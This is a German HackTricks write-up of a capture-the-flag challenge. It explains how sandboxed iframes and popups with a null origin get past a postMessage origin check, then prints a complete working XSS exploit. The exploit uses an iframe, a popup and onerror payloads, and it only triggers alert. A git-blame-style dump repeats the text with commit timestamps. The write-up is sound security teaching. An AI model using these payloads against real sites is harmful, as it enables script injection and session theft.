hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md

# Umgehung der SOP mit Iframes - 1

<details>

<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Arbeiten Sie in einem **Cybersicherheitsunternehmen**? Möchten Sie Ihr **Unternehmen in HackTricks bewerben**? Oder möchten Sie Zugriff auf die **neueste Version von PEASS oder HackTricks im PDF-Format** haben? Überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* **Treten Sie der** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie mir auf **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das [hacktricks repo](https://github.com/carlospolop/hacktricks) und [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)** einreichen.

</details>

## Iframes in SOP-1

In dieser [**Herausforderung**](https://github.com/terjanq/same-origin-xss), erstellt von [**NDevTK**](https://github.com/NDevTK) und [**Terjanq**](https://github.com/terjanq), müssen Sie eine XSS im codierten
```javascript
const identifier = '4a600cd2d4f9aa1cfb5aa786';
onmessage = e => {
const data = e.data;
if (e.origin !== window.origin && data.identifier !== identifier) return;
if (data.type === 'render') {
renderContainer.innerHTML = data.body;
}
}
```
Das Hauptproblem besteht darin, dass die [**Hauptseite**](https://so-xss.terjanq.me) DomPurify verwendet, um die `data.body` zu senden. Um Ihre eigenen HTML-Daten an diesen Code zu senden, müssen Sie `e.origin !== window.origin` umgehen.

Schauen wir uns die vorgeschlagene Lösung an.

### SOP-Umgehung 1 (e.origin === null)

Wenn `//example.org` in ein **sandboxed iframe** eingebettet ist, wird der Ursprung der Seite **`null`** sein, d.h. **`window.origin === null`**. Durch das Einbetten des iframes über `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` könnten wir also den Ursprung **`null` erzwingen**.

Wenn die Seite **einbettbar** wäre, könnten Sie diesen Schutz auf diese Weise umgehen (Cookies müssen möglicherweise auch auf `SameSite=None` gesetzt werden).

### SOP-Umgehung 2 (window.origin === null)

Die weniger bekannte Tatsache ist, dass wenn der **Sandbox-Wert `allow-popups` gesetzt ist**, das **geöffnete Popup** alle **gesandboxten Attribute** erbt, es sei denn, `allow-popups-to-escape-sandbox` ist gesetzt.\
Daher wird das Öffnen eines **Popups** von einem **null Ursprung** dazu führen, dass auch **`window.origin`** im Popup **`null`** ist.

### Lösung für die Herausforderung

Daher könnte man für diese Herausforderung ein **iframe erstellen**, ein **Popup** zur Seite mit dem anfälligen XSS-Code-Handler (`/iframe.php`) öffnen, da `window.origin === e.origin`, da beide `null` sind, ist es möglich, eine Payload zu senden, die das XSS ausnutzt.

Diese **Payload** wird den **Identifier** abrufen und ein **XSS** an die **Hauptseite** (die Seite, die das Popup öffnet) senden, **die** die **Position ändern** wird, um das anfällige `/iframe.php` aufzurufen. Da der Identifier bekannt ist, spielt es keine Rolle, dass die Bedingung `window.origin === e.origin` nicht erfüllt ist (denken Sie daran, der Ursprung ist das **Popup** aus dem iframe, das den Ursprung **`null`** hat), da `data.identifier === identifier`. Dann wird das **XSS erneut ausgelöst**, diesmal im richtigen Ursprung.
```html
<body>
<script>
f = document.createElement('iframe');

// Needed flags
f.sandbox = 'allow-scripts allow-popups allow-top-navigation';

// Second communication with /iframe.php (this is the top page relocated)
// This will execute the alert in the correct origin
const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
},1000);`.replaceAll('\n',' ');

// Initial communication
// Open /iframe.php in a popup, both iframes and popup will have "null" as origin
// Then, bypass window.origin === e.origin to steal the identifier and communicate
// with the top with the second XSS payload
f.srcdoc = `
<h1>Click me!</h1>
<script>
onclick = e => {
let w = open('https://so-xss.terjanq.me/iframe.php');
onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
setTimeout(_ => {
w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
}, 1000);
};
<\/script>
`
document.body.appendChild(f);
</script>
</body>
```
<details>

<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Arbeiten Sie in einem **Cybersicherheitsunternehmen**? Möchten Sie Ihr **Unternehmen in HackTricks bewerben**? Oder möchten Sie Zugriff auf die **neueste Version von PEASS oder HackTricks als PDF herunterladen**? Überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family).
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com).
* **Treten Sie der** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie mir auf **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das [hacktricks repo](https://github.com/carlospolop/hacktricks) und das [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)** einreichen.

</details>
Translated to German 2024-02-10 15:36:32 +00:00			`# Umgehung der SOP mit Iframes - 1`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`<details>`

Translated to German 2024-02-10 15:36:32 +00:00			`<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`* Arbeiten Sie in einem Cybersicherheitsunternehmen? Möchten Sie Ihr Unternehmen in HackTricks bewerben? Oder möchten Sie Zugriff auf die neueste Version von PEASS oder HackTricks im PDF-Format haben? Überprüfen Sie die [ABONNEMENTPLÄNE](https://github.com/sponsors/carlospolop)!`
			`* Entdecken Sie [The PEASS Family](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Holen Sie sich das [offizielle PEASS & HackTricks-Merchandise](https://peass.creator-spring.com)`
			`* Treten Sie der [💬](https://emojipedia.org/speech-balloon/) [Discord-Gruppe](https://discord.gg/hRep4RUj7f) oder der [Telegram-Gruppe](https://t.me/peass) bei oder folgen Sie mir auf Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das [hacktricks repo](https://github.com/carlospolop/hacktricks) und [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) einreichen.`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`</details>`

			`## Iframes in SOP-1`

Translated to German 2024-02-10 15:36:32 +00:00			`In dieser [Herausforderung](https://github.com/terjanq/same-origin-xss), erstellt von [NDevTK](https://github.com/NDevTK) und [Terjanq](https://github.com/terjanq), müssen Sie eine XSS im codierten`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			```javascript
			`const identifier = '4a600cd2d4f9aa1cfb5aa786';`
			`onmessage = e => {`
Translated to German 2024-02-10 15:36:32 +00:00			`const data = e.data;`
			`if (e.origin !== window.origin && data.identifier !== identifier) return;`
			`if (data.type === 'render') {`
			`renderContainer.innerHTML = data.body;`
			`}`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			`}`
			```
Translated to German 2024-02-10 15:36:32 +00:00			Das Hauptproblem besteht darin, dass die [Hauptseite](https://so-xss.terjanq.me) DomPurify verwendet, um die `data.body` zu senden. Um Ihre eigenen HTML-Daten an diesen Code zu senden, müssen Sie `e.origin !== window.origin` umgehen.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`Schauen wir uns die vorgeschlagene Lösung an.`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`### SOP-Umgehung 1 (e.origin === null)`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			Wenn `//example.org` in ein sandboxed iframe eingebettet ist, wird der Ursprung der Seite `null` sein, d.h. `window.origin === null`. Durch das Einbetten des iframes über `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` könnten wir also den Ursprung `null` erzwingen.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			Wenn die Seite einbettbar wäre, könnten Sie diesen Schutz auf diese Weise umgehen (Cookies müssen möglicherweise auch auf `SameSite=None` gesetzt werden).
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`### SOP-Umgehung 2 (window.origin === null)`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			Die weniger bekannte Tatsache ist, dass wenn der Sandbox-Wert `allow-popups` gesetzt ist, das geöffnete Popup alle gesandboxten Attribute erbt, es sei denn, `allow-popups-to-escape-sandbox` ist gesetzt.\
			Daher wird das Öffnen eines Popups von einem null Ursprung dazu führen, dass auch `window.origin` im Popup `null` ist.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`### Lösung für die Herausforderung`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			Daher könnte man für diese Herausforderung ein iframe erstellen, ein Popup zur Seite mit dem anfälligen XSS-Code-Handler (`/iframe.php`) öffnen, da `window.origin === e.origin`, da beide `null` sind, ist es möglich, eine Payload zu senden, die das XSS ausnutzt.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			Diese Payload wird den Identifier abrufen und ein XSS an die Hauptseite (die Seite, die das Popup öffnet) senden, die die Position ändern wird, um das anfällige `/iframe.php` aufzurufen. Da der Identifier bekannt ist, spielt es keine Rolle, dass die Bedingung `window.origin === e.origin` nicht erfüllt ist (denken Sie daran, der Ursprung ist das Popup aus dem iframe, das den Ursprung `null` hat), da `data.identifier === identifier`. Dann wird das XSS erneut ausgelöst, diesmal im richtigen Ursprung.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			```html
			`<body>`
Translated to German 2024-02-10 15:36:32 +00:00			`<script>`
			`f = document.createElement('iframe');`

			`// Needed flags`
			`f.sandbox = 'allow-scripts allow-popups allow-top-navigation';`

			`// Second communication with /iframe.php (this is the top page relocated)`
			`// This will execute the alert in the correct origin`
			const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
			`x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');`
			},1000);`.replaceAll('\n',' ');

			`// Initial communication`
			`// Open /iframe.php in a popup, both iframes and popup will have "null" as origin`
			`// Then, bypass window.origin === e.origin to steal the identifier and communicate`
			`// with the top with the second XSS payload`
			f.srcdoc = `
			`<h1>Click me!</h1>`
			`<script>`
			`onclick = e => {`
			`let w = open('https://so-xss.terjanq.me/iframe.php');`
			`onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';`
			`setTimeout(_ => {`
			`w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')`
			`}, 1000);`
			`};`
			`<\/script>`
			`
			`document.body.appendChild(f);`
			`</script>`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			`</body>`
			```
			`<details>`

Translated to German 2024-02-10 15:36:32 +00:00			`<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`* Arbeiten Sie in einem Cybersicherheitsunternehmen? Möchten Sie Ihr Unternehmen in HackTricks bewerben? Oder möchten Sie Zugriff auf die neueste Version von PEASS oder HackTricks als PDF herunterladen? Überprüfen Sie die [ABONNEMENTPLÄNE](https://github.com/sponsors/carlospolop)!`
			`* Entdecken Sie [The PEASS Family](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [NFTs](https://opensea.io/collection/the-peass-family).`
			`* Holen Sie sich das [offizielle PEASS & HackTricks-Merchandise](https://peass.creator-spring.com).`
			`* Treten Sie der [💬](https://emojipedia.org/speech-balloon/) [Discord-Gruppe](https://discord.gg/hRep4RUj7f) oder der [Telegram-Gruppe](https://t.me/peass) bei oder folgen Sie mir auf Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das [hacktricks repo](https://github.com/carlospolop/hacktricks) und das [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) einreichen.`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`</details>`